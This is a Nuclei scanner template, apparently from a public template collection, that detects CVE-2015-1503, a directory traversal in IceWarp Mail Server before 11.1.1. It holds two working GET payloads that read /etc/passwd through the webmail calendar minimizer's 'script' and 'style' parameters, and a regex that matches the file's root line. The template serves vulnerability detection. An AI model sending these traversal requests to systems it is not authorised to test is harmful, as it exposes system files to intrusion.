nuclei-templates/cves/2015/CVE-2015-1503.yaml

34 lines
1.1 KiB
YAML

id: CVE-2015-1503
info:
name: IceWarp Mail Server Directory Traversal
author: 0x_Akoko
severity: high
description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
- http://www.icewarp.com
- https://nvd.nist.gov/vuln/detail/CVE-2015-1503
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-1503
cwe-id: CWE-200
tags: cve,cve2015,icewarp,lfi,mail
requests:
- method: GET
path:
- "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
- "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200